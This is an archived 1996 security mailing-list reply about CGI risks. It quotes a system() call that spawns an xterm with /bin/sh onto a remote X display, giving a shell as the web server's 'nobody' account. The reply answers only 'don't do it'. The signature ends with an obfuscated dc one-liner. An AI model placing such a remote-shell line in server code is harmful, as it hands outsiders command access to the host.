[3677] in WWW Security List Archive


Re: Hole: nobody shell

daemon@ATHENA.MIT.EDU (Brian Harvell)
Wed Dec 4 04:14:48 1996

Date: Wed, 4 Dec 1996 02:15:58 -0500 (EST)
From: Brian Harvell <harvell@inet.net>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu

> 
> I was experimenting with cgi scripts when I came up with this idea:
> 
> What if I have a cgi script which does the following:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
> 
> I can now pop an xterm on my display as nobody.
> This way any user can gain access to the nobody account and 
> have fun with it...
> 
> Has this been discussed anywhere?
> Is there a fix out there?
> 
Yeah, don't do it. You can do things a lot worse if you wanted.

Brian


Brian Harvell           harvell@iNet.net        http://www.iNet.net/~harvell
echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc


